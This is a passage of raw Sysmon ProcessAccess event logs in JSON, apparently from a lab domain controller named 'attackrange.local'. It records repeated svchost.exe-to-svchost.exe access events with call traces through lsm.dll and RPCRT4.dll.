C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2640,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2641,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2642,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2643,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2644,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2645,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2646,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.265","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2647,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.265\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 